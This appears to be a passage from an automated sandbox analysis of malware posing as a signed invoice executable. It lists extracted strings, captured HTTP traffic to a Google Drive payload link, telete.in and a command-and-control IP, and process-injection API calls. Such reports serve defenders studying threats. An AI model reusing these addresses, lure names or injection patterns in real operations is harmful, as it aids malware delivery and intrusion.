Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: ldif60.dll.24.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: ldif60.dll.24.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ldif60.dll.24.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ldif60.dll.24.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ldif60.dll.24.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.24.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://ocsp.accv.es0
Source: ldif60.dll.24.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: ldif60.dll.24.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: ldif60.dll.24.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.24.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.24.dr String found in binary or memory: http://repository.swisssign.com/0
Source: ldif60.dll.24.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ldif60.dll.24.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ldif60.dll.24.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.24.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: ldif60.dll.24.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.24.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: RYwTiizs2t.24.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RYwTiizs2t.24.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4wininet.dllMozilla/5
Source: RYwTiizs2t.24.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.24.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.24.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nssckbi.dll.24.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.24.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.24.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.24.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nssckbi.dll.24.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.24.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: ldif60.dll.24.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: RYwTiizs2t.24.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.158.245.117
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1s-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /marinolumuop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telete.in
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
Source: unknown HTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Executable has a suspicious name (potential lure to open the executable)
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static file information: Suspicious name
Uses 32bit PE files
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7E91 0_2_022F7E91
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6F7D 0_2_022F6F7D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA848 0_2_022FA848
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0941 0_2_022F0941
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F11C2 0_2_022F11C2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB9D0 0_2_022FB9D0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5E24 0_2_022F5E24
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3A38 0_2_022F3A38
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA02 0_2_022FBA02
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F161F 0_2_022F161F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0E1E 0_2_022F0E1E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1A13 0_2_022F1A13
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5A6E 0_2_022F5A6E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA7B 0_2_022FBA7B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5679 0_2_022F5679
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3678 0_2_022F3678
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAA4E 0_2_022FAA4E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1258 0_2_022F1258
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7650 0_2_022F7650
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F26B9 0_2_022F26B9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBAB9 0_2_022FBAB9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA2B5 0_2_022FA2B5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EB4 0_2_022F5EB4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F628C 0_2_022F628C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EEB 0_2_022F5EEB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F2AE6 0_2_022F2AE6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F36FF 0_2_022F36FF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0AF8 0_2_022F0AF8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F12C9 0_2_022F12C9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3AC8 0_2_022F3AC8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F06C2 0_2_022F06C2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FC2C0 0_2_022FC2C0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F16DC 0_2_022F16DC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F2AD8 0_2_022F2AD8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAAD8 0_2_022FAAD8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5AD7 0_2_022F5AD7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F76D2 0_2_022F76D2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0329 0_2_022F0329
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9F22 0_2_022F9F22
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAF3D 0_2_022FAF3D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F630E 0_2_022F630E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9F1D 0_2_022F9F1D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA31B 0_2_022FA31B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0367 0_2_022F0367
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1366 0_2_022F1366
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAB65 0_2_022FAB65
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F577F 0_2_022F577F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAF77 0_2_022FAF77
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F174F 0_2_022F174F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4748 0_2_022F4748
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0B59 0_2_022F0B59
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBB56 0_2_022FBB56
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5F52 0_2_022F5F52
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6FA6 0_2_022F6FA6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0BA0 0_2_022F0BA0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3B83 0_2_022F3B83
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F279D 0_2_022F279D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9F96 0_2_022F9F96
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4794 0_2_022F4794
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F17E6 0_2_022F17E6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5FE3 0_2_022F5FE3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FABE2 0_2_022FABE2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F47FD 0_2_022F47FD
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F13FC 0_2_022F13FC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F27F0 0_2_022F27F0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F67CA 0_2_022F67CA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0BDF 0_2_022F0BDF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBBD1 0_2_022FBBD1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3C2D 0_2_022F3C2D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA02A 0_2_022FA02A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7023 0_2_022F7023
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC3B 0_2_022FBC3B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6C33 0_2_022F6C33
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F040A 0_2_022F040A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC07 0_2_022FBC07
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3416 0_2_022F3416
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5C15 0_2_022F5C15
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5813 0_2_022F5813
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAC6C 0_2_022FAC6C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAC6A 0_2_022FAC6A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1468 0_2_022F1468
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4863 0_2_022F4863
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0C60 0_2_022F0C60
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1872 0_2_022F1872
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F344B 0_2_022F344B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA84A 0_2_022FA84A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F04A3 0_2_022F04A3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCA0 0_2_022FBCA0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA0B6 0_2_022FA0B6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F608A 0_2_022F608A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3C9B 0_2_022F3C9B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0CEC 0_2_022F0CEC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F34E7 0_2_022F34E7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCE6 0_2_022FBCE6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F14FD 0_2_022F14FD
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F74F9 0_2_022F74F9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F50F5 0_2_022F50F5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4CCC 0_2_022F4CCC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F58CC 0_2_022F58CC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F2CD3 0_2_022F2CD3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5CD3 0_2_022F5CD3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1929 0_2_022F1929
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4924 0_2_022F4924
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3535 0_2_022F3535
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3D33 0_2_022F3D33
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7531 0_2_022F7531
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5100 0_2_022F5100
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F611D 0_2_022F611D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA918 0_2_022FA918
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0D6D 0_2_022F0D6D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA973 0_2_022FA973
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F594D 0_2_022F594D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F555C 0_2_022F555C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA158 0_2_022FA158
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9951 0_2_022F9951
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F95AE 0_2_022F95AE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F51AB 0_2_022F51AB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F15A6 0_2_022F15A6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F75BF 0_2_022F75BF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F69BA 0_2_022F69BA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F61B9 0_2_022F61B9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F518E 0_2_022F518E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9D8E 0_2_022F9D8E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F898A 0_2_022F898A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1989 0_2_022F1989
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9987 0_2_022F9987
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5D86 0_2_022F5D86
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3997 0_2_022F3997
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F35E9 0_2_022F35E9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3DE8 0_2_022F3DE8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA5E8 0_2_022FA5E8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA1E7 0_2_022FA1E7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9DE5 0_2_022F9DE5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F59E3 0_2_022F59E3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F55CA 0_2_022F55CA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F11C9 0_2_022F11C9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F39C4 0_2_022F39C4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA9D9 0_2_022FA9D9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9AB778 24_2_6E9AB778
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E992766 24_2_6E992766
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99F41F 24_2_6E99F41F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9B3112 24_2_6E9B3112
Contains functionality to call native functions
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7E91 NtWriteVirtualMemory,LdrInitializeThunk, 0_2_022F7E91
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6F7D NtAllocateVirtualMemory, 0_2_022F6F7D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB3C0 NtProtectVirtualMemory, 0_2_022FB3C0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F11C2 NtWriteVirtualMemory,TerminateProcess,LoadLibraryA, 0_2_022F11C2
